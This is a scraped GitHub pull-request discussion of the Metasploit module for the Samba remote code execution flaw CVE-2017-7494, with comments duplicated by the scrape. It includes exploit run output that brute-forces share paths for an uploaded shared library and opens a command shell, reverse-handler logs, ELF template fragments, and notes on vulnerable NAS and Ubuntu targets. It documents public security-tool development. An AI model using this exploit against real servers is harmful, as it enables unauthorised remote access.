[*] 192.168.35.197:445 - Trying location /volume1/SHARE/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /volume1/Share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /volume2/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /volume2/share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /volume2/SHARE/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /volume2/Share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /volume3/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /volume3/share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /volume3/SHARE/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /volume3/Share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /shared/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /shared/share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /shared/SHARE/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /shared/Share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /mnt/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /mnt/share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /mnt/SHARE/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /mnt/Share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /mnt/usb/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /mnt/usb/share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /mnt/usb/SHARE/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /mnt/usb/Share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /media/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /media/share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /media/SHARE/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /media/Share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /mnt/media/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /mnt/media/share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /mnt/media/SHARE/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /mnt/media/Share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /var/samba/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /var/samba/share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /var/samba/SHARE/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /var/samba/Share/dDUJiiuf.so...
[*] 192.168.35.197:445 - Trying location /tmp/dDUJiiuf.so...
[*] Command shell session 1 opened (192.168.35.197:4444 -> 192.168.35.197:58089) at 2017-05-25 13:26:19 +0800

id
uid=65534(nobody) gid=0(root) groups=0(root),65534(nogroup)

whoami
nobody
+
+phdrsize equ $ - phdr
+ dd 2 ; p_type = PT_DYNAMIC
+ dd 7 ; p_flags = rwx

This comment has been minimized.

@timwr

timwr May 25, 2017

Contributor

p_flags needs to move to after p_memsz (like in the PT_LOAD section)

@timwr

timwr May 25, 2017

Contributor

p_flags needs to move to after p_memsz (like in the PT_LOAD section)

This comment has been minimized.

@hdm

hdm May 25, 2017

Contributor

Have you tested with this change?

@hdm

hdm May 25, 2017

Contributor

Have you tested with this change?

This comment has been minimized.

@timwr

timwr May 25, 2017

Contributor

I'm struggling to get a decent test environment set up. I can test with LD_PRELOAD on Android and Linux debian-armel 3.2.0-4-versatile #1 Debian 3.2.51-1 armv5tejl GNU/Linux. Neither are working for me (even after this change).

@timwr

timwr May 25, 2017

Contributor

I'm struggling to get a decent test environment set up. I can test with LD_PRELOAD on Android and Linux debian-armel 3.2.0-4-versatile #1 Debian 3.2.51-1 armv5tejl GNU/Linux. Neither are working for me (even after this change).

@Marin111

This comment has been minimized.

Show comment
Hide comment
@Marin111

Marin111 May 25, 2017

for centos6.5 it's not success

for centos6.5 it's not success

@xmycroftx

This comment has been minimized.

Show comment
Hide comment
@xmycroftx

xmycroftx May 25, 2017

Osx uses smbx which supposedly happened to avoid smb3(gplv3). Worth a test though.

Osx uses smbx which supposedly happened to avoid smb3(gplv3). Worth a test though.

@hdm

This comment has been minimized.

Show comment
Hide comment
@hdm

hdm May 25, 2017

Contributor

Thanks folks! Sounds like we need to:

  • Fix ARMLE support
  • Look into Mac OS X support
  • Delete the .so after the module completes

Additionally, Mr. Tavis Ormandy suggested a nice way to exploit this without knowing the path using two connections and /proc/self/cwd, which I will try to implement in the near future (this PR if its languishing or the next one).

I would love some help for ARMLE, MIPS, and OS X (for .so templates).

Contributor

hdm commented May 25, 2017

Thanks folks! Sounds like we need to:

  • Fix ARMLE support
  • Look into Mac OS X support
  • Delete the .so after the module completes

Additionally, Mr. Tavis Ormandy suggested a nice way to exploit this without knowing the path using two connections and /proc/self/cwd, which I will try to implement in the near future (this PR if its languishing or the next one).

I would love some help for ARMLE, MIPS, and OS X (for .so templates).

@bcoles

This comment has been minimized.

Show comment
Hide comment
@bcoles

bcoles May 25, 2017

Contributor

@hiw0rld do you have a stack trace? I don't see .dup used anywhere in this PR.

Contributor

bcoles commented May 25, 2017

@hiw0rld do you have a stack trace? I don't see .dup used anywhere in this PR.

@busterb

This comment has been minimized.

Show comment
Hide comment
@busterb

busterb May 25, 2017

Contributor

Dear spectators - a pull request is a work-in-progress. If you do not know how to debug problems, pull code into your branch, or to expect some rough edges, then please abstain from commenting until this pull request has been merged. Otherwise it becomes noise that simply slows down progress. Thanks!

Contributor

busterb commented May 25, 2017

Dear spectators - a pull request is a work-in-progress. If you do not know how to debug problems, pull code into your branch, or to expect some rough edges, then please abstain from commenting until this pull request has been merged. Otherwise it becomes noise that simply slows down progress. Thanks!

@tsellers-r7

This comment has been minimized.

Show comment
Hide comment
@tsellers-r7

tsellers-r7 May 25, 2017

@bcoles @hdm @wvu-r7

FYI, if you implement vulnerability checking please keep in mind that at least some versions of Samba include Windows in the Native OS value.

For example, on Kali with Samba 4.5.6 installed:

user@kali:~$ smbd --version
Version 4.5.6-Debian

Wireshark image:
screen shot 2017-05-25 at 8 39 21 am

Reference:
https://github.com/samba-team/samba/blob/aa43d0d81baa497135a17e843b05336b4a504809/source3/smbd/sesssetup.c#L50

Looks like this was changed from Unix to Windows in January 2014, released in 4.1.12 or 4.1.13 (I think) :
samba-team/samba@666948c

tsellers-r7 commented May 25, 2017

@bcoles @hdm @wvu-r7

FYI, if you implement vulnerability checking please keep in mind that at least some versions of Samba include Windows in the Native OS value.

For example, on Kali with Samba 4.5.6 installed:

user@kali:~$ smbd --version
Version 4.5.6-Debian

Wireshark image:
screen shot 2017-05-25 at 8 39 21 am

Reference:
https://github.com/samba-team/samba/blob/aa43d0d81baa497135a17e843b05336b4a504809/source3/smbd/sesssetup.c#L50

Looks like this was changed from Unix to Windows in January 2014, released in 4.1.12 or 4.1.13 (I think) :
samba-team/samba@666948c

@egypt

This comment has been minimized.

Show comment
Hide comment
@egypt

egypt May 25, 2017

Contributor

@tsellers-r7 ugh, that's super annoying. Thanks for spotting it.

Contributor

egypt commented May 25, 2017

@tsellers-r7 ugh, that's super annoying. Thanks for spotting it.

@hdm

This comment has been minimized.

Show comment
Hide comment
@hdm

hdm May 25, 2017

Contributor

Tested versions here (x86_64):

  • Ubuntu 16.04 with Samba 4.3.11 (2:4.3.11+dfsg-0ubuntu0.16.04.6)
  • Synology NAS DS2415+ running DSM 6.1-15047 Update 1 and Samba 4.3.11
Contributor

hdm commented May 25, 2017

Tested versions here (x86_64):

  • Ubuntu 16.04 with Samba 4.3.11 (2:4.3.11+dfsg-0ubuntu0.16.04.6)
  • Synology NAS DS2415+ running DSM 6.1-15047 Update 1 and Samba 4.3.11
@fupinglee

This comment has been minimized.

Show comment
Hide comment
@fupinglee

fupinglee May 25, 2017

@michelep I tested success。
samba 4.3.11-Ubuntu
ubuntu 16.04.2
you can see it form this blog.
http://fuping.site/2017/05/25/Samba-Remote-Code-Execution-Vulnerability-Replication/

@michelep I tested success。
samba 4.3.11-Ubuntu
ubuntu 16.04.2
you can see it form this blog.
http://fuping.site/2017/05/25/Samba-Remote-Code-Execution-Vulnerability-Replication/

@mzpqnxow

This comment has been minimized.

Show comment
Hide comment
@mzpqnxow

mzpqnxow May 25, 2017

@busterb I have a toolchain (or had a toolchain) for armel oabi if that helps... what a pain shellcode for that was :/

@busterb I have a toolchain (or had a toolchain) for armel oabi if that helps... what a pain shellcode for that was :/

@mzpqnxow

This comment has been minimized.

Show comment
Hide comment
@mzpqnxow

mzpqnxow May 25, 2017

@hdm I can build .so for a wide range of mips/mipsel (several abis/formats) and armel oabi I just need the .c for the .so

mzpqnxow commented May 25, 2017

@hdm I can build .so for a wide range of mips/mipsel (several abis/formats) and armel oabi I just need the .c for the .so

@hdm

This comment has been minimized.

Show comment
Hide comment
@hdm

hdm May 25, 2017

Contributor

@Mzack9999 were hoping to use the same .s ELF templates for all platforms (data/template/src/elf/dll/*.s), the MIPSLE may be identical to ARMLE, but MIPSBE needs some changes for the endian swap. ARM64 would be nice as well

Contributor

hdm commented May 25, 2017

@Mzack9999 were hoping to use the same .s ELF templates for all platforms (data/template/src/elf/dll/*.s), the MIPSLE may be identical to ARMLE, but MIPSBE needs some changes for the endian swap. ARM64 would be nice as well

@mzpqnxow

This comment has been minimized.

Show comment
Hide comment
@mzpqnxow

mzpqnxow May 25, 2017

oo I misunderstood, so this doesn't need a cross-compiler at all does it? Just nasm (or objcopy, or whatever) to create a blank shared library? Admittedly I didn't read what this shared library was actually for, but it appears it is a skeleton ELF file with no actual assembly code... so I probably have nothing to offer

mzpqnxow commented May 25, 2017

oo I misunderstood, so this doesn't need a cross-compiler at all does it? Just nasm (or objcopy, or whatever) to create a blank shared library? Admittedly I didn't read what this shared library was actually for, but it appears it is a skeleton ELF file with no actual assembly code... so I probably have nothing to offer

@mzpqnxow

This comment has been minimized.

Show comment
Hide comment
@mzpqnxow

mzpqnxow May 25, 2017

I will take a shot if I have time, but you will need a separate file for each arch as far as I can tell:

dw 62 ; e_machine = EM_X86_64

I will take a shot if I have time, but you will need a separate file for each arch as far as I can tell:

dw 62 ; e_machine = EM_X86_64

@mzpqnxow

This comment has been minimized.

Show comment
Hide comment
@mzpqnxow

mzpqnxow May 25, 2017

Or perhaps you meant this should be done in some templating language, in which case I am not familiar enough with Ruby nor whichever templating language Metasploit is using to be able to produce such a thing. I can give you raw dumps of .so files for each platform you're interested in and/or the raw field values themselves

mzpqnxow commented May 25, 2017

Or perhaps you meant this should be done in some templating language, in which case I am not familiar enough with Ruby nor whichever templating language Metasploit is using to be able to produce such a thing. I can give you raw dumps of .so files for each platform you're interested in and/or the raw field values themselves

@timwr

This comment has been minimized.

Show comment
Hide comment
@timwr

timwr May 25, 2017

Contributor

@mzpqnxow we could very much use your cross compiler skills here: https://github.com/rapid7/mettle (it's the Linux meterpreter).

Contributor

timwr commented May 25, 2017

@mzpqnxow we could very much use your cross compiler skills here: https://github.com/rapid7/mettle (it's the Linux meterpreter).

@mzpqnxow

This comment has been minimized.

Show comment
Hide comment
@mzpqnxow

mzpqnxow May 25, 2017

My time is tight right now, but I will see what I can do.. Rapid-7 is net-30 right?

:P

My time is tight right now, but I will see what I can do.. Rapid-7 is net-30 right?

:P

@mzpqnxow

This comment has been minimized.

Show comment
Hide comment
@mzpqnxow

mzpqnxow May 25, 2017

@aconite33

This comment has been minimized.

Show comment
Hide comment
@aconite33

aconite33 May 25, 2017

Edit***
If you do a fresh install and do not allow network connections and install the Samba package via install (CD), this exploit will work. The network install (apt-get install samba) seems to have been updated (4.3.11)


Following @fupinglee blog and talking to @hdm I was unable to reproduce the exploit on Ubuntu 16.04.02. Per @hdm I ran "strace -f -qix -o smbd.log smbd -F -S". I've attached the log here.

root@ubuntu:/tmp# uname -a
Linux ubuntu 4.8.0-36-generic #36~16.04.1-Ubuntu SMP Sun Feb 5 09:39:57 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
root@ubuntu:/tmp# smbd -V
Version 4.3.11-Ubuntu

My config for Samba is as follows:

[asdf]
	path=/tmp
	public=yes
	writeable=yes

I cloned HDM's branch when I ran this from Metasploit. I also followed @fupinglee on a Kali distro msf and the results were the same.
smbd.log.tar.gz

aconite33 commented May 25, 2017

Edit***
If you do a fresh install and do not allow network connections and install the Samba package via install (CD), this exploit will work. The network install (apt-get install samba) seems to have been updated (4.3.11)


Following @fupinglee blog and talking to @hdm I was unable to reproduce the exploit on Ubuntu 16.04.02. Per @hdm I ran "strace -f -qix -o smbd.log smbd -F -S". I've attached the log here.

root@ubuntu:/tmp# uname -a
Linux ubuntu 4.8.0-36-generic #36~16.04.1-Ubuntu SMP Sun Feb 5 09:39:57 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
root@ubuntu:/tmp# smbd -V
Version 4.3.11-Ubuntu

My config for Samba is as follows:

[asdf]
	path=/tmp
	public=yes
	writeable=yes

I cloned HDM's branch when I ran this from Metasploit. I also followed @fupinglee on a Kali distro msf and the results were the same.
smbd.log.tar.gz

@hdm

This comment has been minimized.

Show comment
Hide comment
@hdm

hdm May 25, 2017

Contributor

@Mzack9999 thanks for the offer but it looks like we will have this sorted out soon.

Contributor

hdm commented May 25, 2017

@Mzack9999 thanks for the offer but it looks like we will have this sorted out soon.

@hashtaginfosec

This comment has been minimized.

Show comment
Hide comment
@hashtaginfosec

hashtaginfosec May 25, 2017

Ran it against Synology Disk Station DS212j and got no-access and STATUS_ACCOUNT_DISABLED. I think this is because default admin account is disabled.

[*] Started reverse TCP handler on 192.168.1.100:4444
[-] 192.168.1.101:445 - Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: The server responded with error: STATUS_ACCOUNT_DISABLED (Command=115 WordCount=0)
[*] Exploit completed, but no session was created.

Ran it against Synology Disk Station DS212j and got no-access and STATUS_ACCOUNT_DISABLED. I think this is because default admin account is disabled.

[*] Started reverse TCP handler on 192.168.1.100:4444
[-] 192.168.1.101:445 - Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: The server responded with error: STATUS_ACCOUNT_DISABLED (Command=115 WordCount=0)
[*] Exploit completed, but no session was created.
@Viss

This comment has been minimized.

Show comment
Hide comment
@Viss

Viss May 25, 2017

synology nas DS1815+ vulnerable as well!

Viss commented May 25, 2017

synology nas DS1815+ vulnerable as well!

@0x00string

This comment has been minimized.

Show comment
Hide comment
@0x00string

0x00string May 25, 2017

I'm getting the following error when running the exploit against:

Linux HOSTNAME 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux

With samba version:

Version 4.3.11-Ubuntu

[-] 172.20.32.4:445 - Exploit failed: Rex::Proto::SMB::Exceptions::NoReply The SMB server did not reply to our request

Exploits dies after getting a RST in response to Tree Disconnect after uploading the test .txt file.

my smb.conf lines for the shares are as follows:

[sambashare]
path = /sambashare
browsable = yes
public = yes
writable = yes
guest ok = yes
create mask = 0644
directory mask = 0755
force user = shareuser

[simple]
path = /simpleshare
public = yes
writeable = yes
guest ok = yes
browsable = yes

Thanks to @hdm for inadvertently fixing my msfvenom bug too!

0x00string commented May 25, 2017

I'm getting the following error when running the exploit against:

Linux HOSTNAME 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux

With samba version:

Version 4.3.11-Ubuntu

[-] 172.20.32.4:445 - Exploit failed: Rex::Proto::SMB::Exceptions::NoReply The SMB server did not reply to our request

Exploits dies after getting a RST in response to Tree Disconnect after uploading the test .txt file.

my smb.conf lines for the shares are as follows:

[sambashare]
path = /sambashare
browsable = yes
public = yes
writable = yes
guest ok = yes
create mask = 0644
directory mask = 0755
force user = shareuser

[simple]
path = /simpleshare
public = yes
writeable = yes
guest ok = yes
browsable = yes

Thanks to @hdm for inadvertently fixing my msfvenom bug too!

@egypt

This comment has been minimized.

Show comment
Hide comment
@egypt

egypt May 25, 2017

Contributor

@hdm how close would you say this is to done? Would it be reasonable to land this in its current state and continue dev in a new PR?

Contributor

egypt commented May 25, 2017

@hdm how close would you say this is to done? Would it be reasonable to land this in its current state and continue dev in a new PR?

@wvu-r7

This comment has been minimized.

Show comment
Hide comment
@wvu-r7

wvu-r7 May 25, 2017

Contributor

I'm ready to ship this. It works quite well.

Contributor

wvu-r7 commented May 25, 2017

I'm ready to ship this. It works quite well.

@hdm

This comment has been minimized.

Show comment
Hide comment
@hdm

hdm May 25, 2017

Contributor

@egypt This should be good to go for now, I added the BruteforcePID advanced option for folks who want to test, but its disabled by default. The code now also autodeletes the payload from the share.

Contributor

hdm commented May 25, 2017

@egypt This should be good to go for now, I added the BruteforcePID advanced option for folks who want to test, but its disabled by default. The code now also autodeletes the payload from the share.

@hdm

This comment has been minimized.

Show comment
Hide comment
@hdm

hdm May 25, 2017

Contributor

Should we disable the ARM target or forcibly set 'SHELL' on the payload option?

Contributor

hdm commented May 25, 2017

Should we disable the ARM target or forcibly set 'SHELL' on the payload option?

@hdm

This comment has been minimized.

Show comment
Hide comment
@hdm

hdm May 25, 2017

Contributor

@qasimchadhar That happens when Guest is 'disabled'

Contributor

hdm commented May 25, 2017

@qasimchadhar That happens when Guest is 'disabled'

@hdm

This comment has been minimized.

Show comment
Hide comment
@hdm

hdm May 25, 2017

Contributor

@reznok Double check to make sure the patch wasn't automatically installed

Contributor

hdm commented May 25, 2017

@reznok Double check to make sure the patch wasn't automatically installed

@h00die

This comment has been minimized.

Show comment
Hide comment
@h00die

h00die May 25, 2017

Contributor

The PR for the docs is ready to land before this is landed. It's good enough for the time being

Contributor

h00die commented May 25, 2017

The PR for the docs is ready to land before this is landed. It's good enough for the time being

Merge pull request #15 from h00die/sambapwn
docs for is_known_pipename

wvu-r7 added a commit to wvu-r7/metasploit-framework that referenced this pull request May 25, 2017

@wvu-r7 wvu-r7 merged commit 4ec5831 into rapid7:master May 25, 2017

1 check was pending

continuous-integration/travis-ci/pr The Travis CI build is in progress
Details
@OJ

This comment has been minimized.

Show comment
Hide comment
@OJ

OJ May 25, 2017

Contributor

Nice

Contributor

OJ commented May 25, 2017

Nice

@hiw0rld

This comment has been minimized.

Show comment
Hide comment
@hiw0rld

hiw0rld May 26, 2017

@bcoles I dont use any stack trace you mean client or samba server?

hiw0rld commented May 26, 2017

@bcoles I dont use any stack trace you mean client or samba server?

@hdm hdm deleted the hdm:module/CVE-2017-7494 branch May 26, 2017

@nixawk

This comment has been minimized.

Show comment
Hide comment
@nixawk

nixawk May 26, 2017

Contributor

Bug Flow

-> /path/to/samba-X.X.XX

bug-flow

Contributor

nixawk commented May 26, 2017

Bug Flow

-> /path/to/samba-X.X.XX

bug-flow

@hdm

This comment has been minimized.

Show comment
Hide comment
@hdm

hdm May 28, 2017

Contributor

Maybe time to lock this PR for future comments?

Contributor

hdm commented May 28, 2017

Maybe time to lock this PR for future comments?

@wvu-r7

This comment has been minimized.

Show comment
Hide comment
@wvu-r7

wvu-r7 May 28, 2017

Contributor

Agreed. This is not a support forum, folks. Take it to IRC or the Rapid7 Community site. File a ticket if it's a bug.

Contributor

wvu-r7 commented May 28, 2017

Agreed. This is not a support forum, folks. Take it to IRC or the Rapid7 Community site. File a ticket if it's a bug.

@rapid7 rapid7 locked and limited conversation to collaborators May 28, 2017

@h00die h00die added the docs label May 29, 2017

@alrosenthal-r7

This comment has been minimized.

Show comment
Hide comment
@alrosenthal-r7

alrosenthal-r7 May 31, 2017

Release Notes

The exploits/linux/samba/is_known_pipename module has been added to the framework. This module exploits Samba from versions 3.5.0-4.4.14, 4.5.10, and 4.6.4 by loading a malicious shared library. The exploit requires valid credentials, a writeable folder in an accessible share, and the server-side path of the writeable folder. However, in some cases anonymous access with common filesystem locations can be used to automate exploitation.

Release Notes

The exploits/linux/samba/is_known_pipename module has been added to the framework. This module exploits Samba from versions 3.5.0-4.4.14, 4.5.10, and 4.6.4 by loading a malicious shared library. The exploit requires valid credentials, a writeable folder in an accessible share, and the server-side path of the writeable folder. However, in some cases anonymous access with common filesystem locations can be used to automate exploitation.

@hdm

This comment has been minimized.

Show comment
Hide comment
@hdm

hdm Jun 1, 2017

Contributor

^ no longer true with the current PR.

Contributor

hdm commented Jun 1, 2017

^ no longer true with the current PR.

@h00die

This comment has been minimized.

Show comment
Hide comment
@h00die

h00die Jun 1, 2017

Contributor

May need to update the docs and info section (or just the docs). I have a note to review and update the MD tomorrow to update

Contributor

h00die commented Jun 1, 2017

May need to update the docs and info section (or just the docs). I have a note to review and update the MD tomorrow to update

Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.